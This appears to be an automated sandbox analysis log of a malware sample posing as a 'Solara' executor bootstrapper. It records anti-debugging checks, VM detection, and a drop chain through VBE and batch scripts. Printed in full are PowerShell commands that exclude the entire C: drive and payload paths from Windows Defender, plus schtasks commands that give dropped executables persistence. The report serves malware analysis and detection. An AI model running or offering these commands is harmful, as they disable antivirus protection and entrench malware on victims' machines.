Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

API call chain: ExitProcess graph end node

graph_3-24912

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: 3_2_00D3F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00D3F838

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: 3_2_00D47DEE mov eax, dword ptr fs:[00000030h]

3_2_00D47DEE

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: 3_2_00D4C030 GetProcessHeap,

3_2_00D4C030

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process token adjusted: Debug
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Process token adjusted: Debug
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Process token adjusted: Debug
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D3F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00D3F838
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D3F9D5 SetUnhandledExceptionFilter,	3_2_00D3F9D5
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D3FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00D3FBCA
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D48EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00D48EBD

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: BootstrapperV1.19.exe PID: 7152, type: MEMORYSTR
Source: Yara match	File source: \Device\ConDrv, type: DROPPED

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'	Jump to behavior

Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Process created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe"	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Process created: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: 3_2_00D3F654 cpuid

3_2_00D3F654

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

3_2_00D3AF0F

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
